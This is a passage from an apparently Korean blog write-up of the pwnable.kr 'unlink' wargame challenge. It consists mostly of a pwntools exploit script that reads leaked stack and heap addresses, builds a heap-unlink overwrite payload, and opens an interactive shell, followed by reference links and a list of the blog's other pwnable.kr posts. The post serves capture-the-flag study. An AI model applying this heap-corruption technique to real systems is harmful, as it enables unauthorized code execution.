payload
from pwn import *
p = process('/home/unlink/unlink')
p.recvuntil("here is stack address leak:")
stackAddr = int(p.recvline(0), 16)
p.recvuntil("here is heap address leak:")
heapAddr = int(p.recvline(0), 16)
payload = "\xeb\x84\x04\x08"
payload += "A"*12
payload += p32(heapAddr+0xc)
payload += p32(stackAddr+0x10)
p.send(payload)
print p.interactive()
참고
http://www.hackerschool.org/HS_Boards/data/Lib_system/dfb_leon.txt
https://bpsecblog.wordpress.com/2016/10/06/heap_vuln/
http://nroses-taek.tistory.com/160
https://delspon.wordpress.com/2017/07/07/pwnable-kr-unlink/
'Wargame > pwnable.kr' 카테고리의 다른 글
| pwnable.kr simple login (0) | 2018.06.27 |
|---|---|
| pwnable.kr fix (0) | 2018.06.23 |
| pwnable.kr cmd2 (0) | 2018.06.15 |
| pwnable.kr cmd1 (0) | 2018.06.15 |
| pwnable.kr input (0) | 2018.06.14 |